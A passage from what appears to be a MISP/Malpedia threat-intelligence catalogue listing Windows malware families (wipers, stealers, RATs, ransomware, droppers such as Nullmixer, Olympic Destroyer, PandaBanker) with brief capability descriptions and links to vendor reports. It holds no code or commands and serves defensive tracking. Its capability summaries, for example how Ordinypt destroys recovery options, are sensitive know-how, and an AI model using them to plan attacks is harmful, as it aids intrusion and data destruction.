https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

NominatusToxicBattery

A wiper that overwrites target files with itself, thus spreading in virus-fashion.

The tag is: misp-galaxy:malpedia="NominatusToxicBattery"

NominatusToxicBattery is also known as:

Table 4161. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nominatus_toxic_battery

https://twitter.com/struppigel/status/1501473254787198977

https://www.trellix.com/en-us/about/newsroom/stories/research/wipermania-an-all-you-can-wipe-buffet.html

Nopyfy

Ransomware

The tag is: misp-galaxy:malpedia="Nopyfy"

Nopyfy is also known as:

Table 4162. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nopyfy

https://labs.k7computing.com/index.php/say-no-to-nopyfy/

NorthStar

An open source C2 framework intended for pentest and red teaming activities.

The tag is: misp-galaxy:malpedia="NorthStar"

NorthStar is also known as:

Table 4163. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.northstar

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

Nosu

According to PCrisk, Nosu is the name of a malicious program classified as a stealer. This malware is designed to steal information from infected machines. The Nosu stealer can extract a wide variety of data from devices and installed applications. The most active campaigns associated with Nosu were noted in North and South America, as well as Southeast Asia.

The tag is: misp-galaxy:malpedia="Nosu"

Nosu is also known as:

Table 4164. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nosu

https://www.bitsight.com/blog/cova-and-nosu-new-loader-spreads-new-stealer

Nova Stealer

Nova Stealer is a new information stealer that is offered as Malware-as-a-Service by a new actor called "Sordeal". Its capabilities include password stealing, browser injections, crypto wallet stealing, discord injections, and screen recordings. Parts of its source code have been made available on GitHub, with certain "Premium" features missing.

The tag is: misp-galaxy:malpedia="Nova Stealer"

Nova Stealer is also known as:

  • Malicord

Table 4165. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nova

https://github.com/ElasBlueWHale2/Malicord

https://www.cyfirma.com/outofband/emerging-maas-operator-sordeal-releases-nova-infostealer/

Nozelesn (Decryptor)

The tag is: misp-galaxy:malpedia="Nozelesn (Decryptor)"

Nozelesn (Decryptor) is also known as:

Table 4167. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nozelesn_decryptor

NuggetPhantom

NSFOCUS describes NuggetPhantom as a modularized malware toolkit that was spread using EternalBlue. Payloads included a RAT and an XMRig miner.

The tag is: misp-galaxy:malpedia="NuggetPhantom"

NuggetPhantom is also known as:

Table 4169. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nugget_phantom

https://staging.nsfocusglobal.com/wp-content/uploads/2018/10/NuggetPhantom-Analysis-Report-V4.1.pdf

https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/

Nullmixer

Nullmixer is a dropper/loader for additional malware. It is known to drop a vast amount of different malware, such as info stealers, RATs and additional loaders. Samples observed contained up to 8 additional payloads.

The tag is: misp-galaxy:malpedia="Nullmixer"

Nullmixer is also known as:

Table 4170. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer

https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/

https://www.youtube.com/watch?v=92jKJ_G_6ho

https://www.youtube.com/watch?v=yLQfDk3dVmA

https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1

https://www.youtube.com/watch?v=v_K_zoPGpdk

Numando

According to PCrisk, Numando is a banking trojan written in the Delphi programming language. As the malicious program’s classification implies, it is designed to steal banking information. Numando primarily targets Brazil, with occasional campaigns occurring in Mexico and Spain.

The tag is: misp-galaxy:malpedia="Numando"

Numando is also known as:

Table 4171. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.numando

https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/

https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/

Nymaim

Nymaim is a trojan downloader. It downloads (and runs) other malware on affected systems and was one of the primary malware families hosted on Avalanche. Nymaim is different in that it displays a localized lockscreen while it downloads additional malware. Nymaim is usually delivered by exploit kits and malvertising.

The tag is: misp-galaxy:malpedia="Nymaim"

Nymaim is also known as:

  • nymain

Table 4174. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim

https://www.proofpoint.com/us/what-old-new-again-nymaim-moves-past-its-ransomware-roots-0

https://www.virusbulletin.com/conference/vb2017/abstracts/linking-xpaj-and-nymaim

https://www.lawfareblog.com/what-point-these-nation-state-indictments

https://blog.talosintelligence.com/goznym/

https://public.gdatasoftware.com/Web/Landingpages/DE/GI-Spring2014/slides/004_plohmann.pdf

https://bitbucket.org/daniel_plohmann/idapatchwork

https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/

https://www.cert.pl/en/news/single/nymaim-revisited/

https://www.justice.gov/opa/pr/goznym-cyber-criminal-network-operating-out-europe-targeting-american-entities-dismantled

https://www.proofpoint.com/us/threat-insight/post/nymaim-config-decoded

https://securityintelligence.com/posts/goznym-closure-comes-in-the-shape-of-a-europol-and-doj-arrest-operation/

https://www.sentinelone.com/blog/goznym-banking-malware-gang-busted/

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://www.shadowserver.org/news/goznym-indictments-action-following-on-from-successful-avalanche-operations/

https://www2.deloitte.com/content/dam/Deloitte/us/Documents/risk/us-aers-the-evolution-of-the-nymaim-criminal-enterprise.pdf

https://github.com/coldshell/Malware-Scripts/tree/master/Nymaim

https://arielkoren.com/blog/2016/11/02/nymaim-deep-technical-dive-adventures-in-evasive-malware/

Oblique RAT

The tag is: misp-galaxy:malpedia="Oblique RAT"

Oblique RAT is also known as:

Table 4176. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques

https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/IoCs_Investigating%20APT36%20or%20Earth%20Karkaddan%20Attack%20Chain%20and%20Malware%20Arsenal.rtf

https://www.bleepingcomputer.com/news/security/hackers-use-modified-mfa-tool-against-indian-govt-employees/

https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html

https://www.secrss.com/articles/24995

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/investigating-apt36-or-earth-karkaddan-attack-chain-and-malware-arsenal/Earth%20Karkaddan%20APT-%20Adversary%20Intelligence%20and%20Monitoring%20Report.pdf

https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html

https://blog.talosintelligence.com/2022/07/transparent-tribe-targets-education.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://securelist.com/transparent-tribe-part-2/98233/

Oceansalt

The tag is: misp-galaxy:malpedia="Oceansalt"

Oceansalt is also known as:

Table 4179. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt

https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

OddJob

The tag is: misp-galaxy:malpedia="OddJob"

OddJob is also known as:

Table 4181. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oddjob

Oderoor

Spam bot that was active around 2007 and after, one of the first malware families to use a domain generation algorithm.

The tag is: misp-galaxy:malpedia="Oderoor"

Oderoor is also known as:

  • Bobax

  • Kraken

Table 4182. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor

https://web.archive.org/web/20160324035554/https://www.johannesbader.ch/2015/12/krakens-two-domain-generation-algorithms//

https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf

Okrum

A new, previously unknown backdoor that we named Okrum. The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors.

The tag is: misp-galaxy:malpedia="Okrum"

Okrum is also known as:

Table 4184. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.okrum

https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/

https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/

https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/

https://securelist.com/apt-trends-report-q3-2020/99204/

OLDBAIT

According to FireEye, OLDBAIT is a credential stealer that has been observed to be used by APT28. It targets Internet Explorer, Mozilla Firefox, Eudora, The Bat! (an email client by a Moldovan company), and Becky! (an email client made by a Japanese company). It can use either HTTP or SMTP to exfiltrate data. In some places it is mistakenly named "Sasfis", which however seems to be a completely different and unrelated malware family.

The tag is: misp-galaxy:malpedia="OLDBAIT"

OLDBAIT is also known as:

  • Sasfis

Table 4185. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.oldbait

https://www.mandiant.com/sites/default/files/2021-09/APT28-Center-of-Storm-2017.pdf

https://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf

https://www.secjuice.com/fancy-bear-review/

Olympic Destroyer

Malware which seems to have no function other than to disrupt computer systems related to the 2018 Winter Olympic event.

The tag is: misp-galaxy:malpedia="Olympic Destroyer"

Olympic Destroyer is also known as:

  • SOURGRAPE

Table 4186. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.olympic_destroyer

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://securelist.com/olympic-destroyer-is-still-alive/86169/

https://www.endgame.com/blog/technical-blog/stopping-olympic-destroyer-new-process-injection-insights

https://cyber.wtf/2018/03/28/dissecting-olympic-destroyer-a-walk-through/

http://blog.talosintelligence.com/2018/02/who-wasnt-responsible-for-olympic.html

https://attack.mitre.org/groups/G0034

https://www.virusbulletin.com/virusbulletin/2018/10/vb2018-paper-who-wasnt-responsible-olympic-destroyer/

https://www.youtube.com/watch?v=1jgdMY12mI8

https://www.wired.com/story/us-indicts-sandworm-hackers-russia-cyberwar-unit/

https://www.lastline.com/labsblog/olympic-destroyer-south-korea/

http://blog.talosintelligence.com/2018/02/olympic-destroyer.html

https://www.lastline.com/labsblog/attribution-from-russia-with-code/

https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too

https://www.youtube.com/watch?v=rjA0Vf75cYk

https://www.wired.com/story/untold-story-2018-olympics-destroyer-cyberattack/

https://www.youtube.com/watch?v=a4BZ3SZN-CI

https://www.mbsd.jp/blog/20180215.html

https://securelist.com/the-devils-in-the-rich-header/84348/

https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://www.youtube.com/watch?v=wCv9SiSA7Sw

https://securelist.com/apt-trends-report-q2-2019/91897/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://securelist.com/olympicdestroyer-is-here-to-trick-the-industry/84295/

OnionDuke

OnionDuke, a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network, appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites.

The tag is: misp-galaxy:malpedia="OnionDuke"

OnionDuke is also known as:

Table 4189. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke

https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/

https://www.f-secure.com/weblog/archives/00002764.html

https://blog.f-secure.com/podcast-dukes-apt29/

https://www.secureworks.com/research/threat-profiles/iron-hemlock

http://contagiodump.blogspot.com/2014/11/onionduke-samples.html

OnlinerSpambot

A spambot that has been observed being used for spreading Ursnif, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada.

The tag is: misp-galaxy:malpedia="OnlinerSpambot"

OnlinerSpambot is also known as:

  • Onliner

  • SBot

Table 4190. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner

https://www.blueliv.com/blog/research/analysis-spam-distribution-botnet-onliner-spambot/

https://benkowlab.blogspot.com/2017/08/from-onliner-spambot-to-millions-of.html

https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html

https://outpost24.com/blog/an-analysis-of-a-spam-distribution-botnet

OpGhoul

This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.

The tag is: misp-galaxy:malpedia="OpGhoul"

OpGhoul is also known as:

Table 4196. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul

https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/

OpBlockBuster

The tag is: misp-galaxy:malpedia="OpBlockBuster"

OpBlockBuster is also known as:

Table 4197. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster

http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/

ORANGEADE

FireEye details ORANGEADE as a dropper for the CREAMSICLE malware.

The tag is: misp-galaxy:malpedia="ORANGEADE"

ORANGEADE is also known as:

Table 4198. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orangeade

https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

OrcaRAT

OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions.

The tag is: misp-galaxy:malpedia="OrcaRAT"

OrcaRAT is also known as:

Table 4199. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat

http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html

https://www.secureworks.com/research/threat-profiles/bronze-fleetwood

Orchard

A malware generating DGA domains seeded by the Bitcoin Genesis Block. This family has strong code overlap with win.victorygate.

The tag is: misp-galaxy:malpedia="Orchard"

Orchard is also known as:

  • Antavmu

Table 4200. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orchard

https://bin.re/blog/a-dga-seeded-by-the-bitcoin-genesis-block/

https://malverse.it/stack-string-decryptor-con-ghidra-emulator-orchard

https://blog.netlab.360.com/orchard-dga/

https://blog.netlab.360.com/a-new-botnet-orchard-generates-dga-domains-with-bitcoin-transaction-information/

Orcus RAT

Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time.

The tag is: misp-galaxy:malpedia="Orcus RAT"

Orcus RAT is also known as:

  • Schnorchel

Table 4201. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat

http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://assets.virustotal.com/reports/2021trends.pdf

https://krebsonsecurity.com/2019/04/canadian-police-raid-orcus-rat-author/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://any.run/cybersecurity-blog/orcus-rat-malware-analysis/

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/

https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html

https://asec.ahnlab.com/en/45462/

https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html

https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors

https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/

Ordinypt

This malware claims to be a ransomware, but it’s actually a wiper. After execution, this malware terminates a number of processes such as database processes, likely to allow access to any files that these programs may have held open. Ordinypt will avoid wiping certain files and folders in order to prevent the infected machine from becoming unusable. Affected files are overwritten with null characters and receive a random 5-character file extension. Finally, shadow copies are removed and Windows startup repair is disabled to complicate recovery of data from the affected system. The desktop background is changed and a ransom note is dropped for the victim. A C2 check-in occurs to keep track of the file extension used on that specific machine, as well as which BitCoin address was randomly provided for payment to the victim (drawn from a long list stored in the ransomware configuration).

The tag is: misp-galaxy:malpedia="Ordinypt"

Ordinypt is also known as:

  • GermanWiper

  • HSDFSDCrypt

Table 4202. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt

https://www.carbonblack.com/2019/09/05/cb-threat-analysis-unit-technical-breakdown-germanwiper-ransomware/

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://dissectingmalwa.re/tfw-ransomware-is-only-your-side-hustle.html

https://www.gdata.de/blog/2017/11/30151-ordinypt

https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/

OriginBot

OriginBot is a modular information stealer which can also download and execute other malicious payloads.

The tag is: misp-galaxy:malpedia="OriginBot"

OriginBot is also known as:

  • OriginBotnet

  • OriginLoader

Table 4203. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.originbot

https://www.fortinet.com/blog/threat-research/originbotnet-spreads-via-malicious-word-document

OriginLogger

The tag is: misp-galaxy:malpedia="OriginLogger"

OriginLogger is also known as:

Table 4204. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.originlogger

https://unit42.paloaltonetworks.com/originlogger/

http://ropgadget.com/posts/originlogger.html

OutCrypt

Ransomware.

The tag is: misp-galaxy:malpedia="OutCrypt"

OutCrypt is also known as:

Table 4209. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt

https://id-ransomware.blogspot.com/2020/07/outcrypt-ransomware.html

OutSteel

According to MITRE, OutSteel is a file uploader and document stealer developed with the scripting language AutoIT that has been used by Ember Bear since at least March 2021.

The tag is: misp-galaxy:malpedia="OutSteel"

OutSteel is also known as:

Table 4211. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.outsteel

https://www.telsy.com/download/6372/?uid=d3eb8e1489

Owowa

Kaspersky describes this as an OWA add-on that has credential stealing capabilities.

The tag is: misp-galaxy:malpedia="Owowa"

Owowa is also known as:

Table 4216. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.owowa

https://securelist.com/owowa-credential-stealer-and-remote-access/105219/

OZH RAT

The tag is: misp-galaxy:malpedia="OZH RAT"

OZH RAT is also known as:

Table 4218. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ozh_rat

https://twitter.com/BushidoToken/status/1266075992679948289

paladin

Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.

The tag is: misp-galaxy:malpedia="paladin"

paladin is also known as:

Table 4221. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin

https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html

https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf

PandaBanker

According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.

This banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.

The baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.

Panda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.

The tag is: misp-galaxy:malpedia="PandaBanker"

PandaBanker is also known as:

  • ZeusPanda

Table 4222. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker

https://www.youtube.com/watch?v=J7VOfAJvxEY

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much

https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers

https://www.spamhaus.org/news/article/771/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko

https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html

https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf

http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware

https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/

http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html

https://medium.com/@crovax/panda-banker-analysis-part-1-d08b3a855847

https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/

https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media

https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/

https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker

Panda Stealer

According to PCrisk, Panda is the name of a malicious program, which is classified as a stealer. It is a new variant of CollectorStealer.

The aim of this malware is to extract and exfiltrate sensitive and personal information from infected devices. Panda primarily targets data relating to cryptocurrency wallets.

This piece of malicious software has been observed being actively distributed via spam campaigns - large-scale operations during which thousands of scam emails are sent. The spam mail proliferating Panda stealer heavily targeted users from the United States, Germany, Japan, and Australia.

The deceptive email letters concerned business-related topics (e.g., fake product quote requests, etc.). Panda stealer is a dangerous program, and as such - its infections must be removed immediately upon detection.

The tag is: misp-galaxy:malpedia="Panda Stealer"

Panda Stealer is also known as:

Table 4223. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer

https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html

https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/

parasite_http

The tag is: misp-galaxy:malpedia="parasite_http"

parasite_http is also known as:

Table 4229. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http

https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks

PartyTicket

PartyTicket is a Go-written ransomware, which was described as a poorly designed one by Zscaler. According to Brett Stone-Gross this malware is likely intended to be a diversion from the Hermetic wiper (aka. KillDisk.NCV, DriveSlayer) attack.

The tag is: misp-galaxy:malpedia="PartyTicket"

PartyTicket is also known as:

  • Elections GoRansom

  • HermeticRansom

  • SonicVote

Table 4230. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.partyticket

https://securelist.com/webinar-on-cyberattacks-in-ukraine-summary-and-qa/106075/

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine

https://www.crowdstrike.com/blog/how-to-decrypt-the-partyticket-ransomware-targeting-ukraine/

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-hermeticwiper-partyticket

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict/IOC%20Resource%20for%20Russia-Ukraine%20Conflict-Related%20Cyberattacks-03032022.pdf

https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/

https://www.mandiant.com/resources/information-operations-surrounding-ukraine

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://www.kaspersky.com/blog/hermeticransom-hermeticwiper-attacks-2022/43825/

https://www.techtarget.com/searchsecurity/news/252514091/CrowdStrike-cracks-PartyTicket-ransomware-targeting-Ukraine

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://www.brighttalk.com/webcast/15591/534324

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://www.mandiant.com/resources/russia-invasion-ukraine-retaliation

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://www.zscaler.com/blogs/security-research/technical-analysis-partyticket-ransomware

https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://go.recordedfuture.com/hubfs/reports/mtp-2022-0302.pdf

https://securelist.com/elections-goransom-and-hermeticwiper-attack/105960/

https://decoded.avast.io/threatresearch/help-for-ukraine-free-decryptor-for-hermeticransom-ransomware/

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://www.bleepingcomputer.com/news/security/free-decryptor-released-for-hermeticransom-victims-in-ukraine/

https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html

Passlock

Ransomware.

The tag is: misp-galaxy:malpedia="Passlock"

Passlock is also known as:

Table 4231. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock

https://id-ransomware.blogspot.com

PcShare

PcShare is an open-source backdoor which has been seen modified and used by Chinese threat actors, mainly attacking countries in South East Asia.

The tag is: misp-galaxy:malpedia="PcShare"

PcShare is also known as:

Table 4234. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare

https://web.archive.org/web/20191115210757/https://threatvector.cylance.com/en_us/home/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware.html

https://go.recordedfuture.com/hubfs/reports/cta-2021-0616.pdf

PeddleCheap

PeddleCheap is a module of the DanderSpritz framework which surfaced with the "Lost in Translation" release of TheShadowBrokers leaks. In May 2020, ESET mentioned that they found mysterious samples of PeddleCheap packed with a custom packer so far exclusively attributed to Winnti.

The tag is: misp-galaxy:malpedia="PeddleCheap"

PeddleCheap is also known as:

Table 4236. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.peddlecheap

https://twitter.com/ESETresearch/status/1258353960781598721

https://research.checkpoint.com/2021/a-deep-dive-into-doublefeature-equation-groups-post-exploitation-dashboard/

https://www.forcepoint.com/fr/blog/security-labs/new-whitepaper-danderspritzpeddlecheap-traffic-analysis-part-1-2#

https://obscuritylabs.com/blog/2017/11/13/match-made-in-the-shadows-part-3/

Pekraut

The tag is: misp-galaxy:malpedia="Pekraut"

Pekraut is also known as:

Table 4237. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pekraut

https://www.gdatasoftware.com/blog/2020/04/35849-pekraut-german-rat-starts-gnawing

Penco

The tag is: misp-galaxy:malpedia="Penco"

Penco is also known as:

Table 4238. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.penco

PennyWise Stealer

The tag is: misp-galaxy:malpedia="PennyWise Stealer"

PennyWise Stealer is also known as:

Table 4239. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pennywise

https://blog.cyble.com/2022/06/30/infostealer/

Peppy RAT

Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once Peppy successfully communicates to its C&C, the keylogging and exfiltration of files using configurable search parameters begins. Files are exfiltrated using HTTP POST requests.

The tag is: misp-galaxy:malpedia="Peppy RAT"

Peppy RAT is also known as:

Table 4240. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.peppy_rat

https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

PetrWrap

The PetrWrap Trojan is written in C and compiled in MS Visual Studio. It carries a sample of the Petya ransomware v3 inside its data section and uses Petya to infect the victim’s machine. What’s more, PetrWrap implements its own cryptographic routines and modifies the code of Petya in runtime to control its execution. This allows the criminals behind PetrWrap to hide the fact that they are using Petya during infection.

The tag is: misp-galaxy:malpedia="PetrWrap"

PetrWrap is also known as:

Table 4241. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap

https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/

https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/

pgift

Information gathering and downloading tool used to deliver second stage malware to the infected system.

The tag is: misp-galaxy:malpedia="pgift"

pgift is also known as:

  • ReRol

Table 4243. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift

PhanDoor

The tag is: misp-galaxy:malpedia="PhanDoor"

PhanDoor is also known as:

Table 4244. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.phandoor

AhnLabAndariel_a_Subgroup_of_Lazarus%20(3).pdf

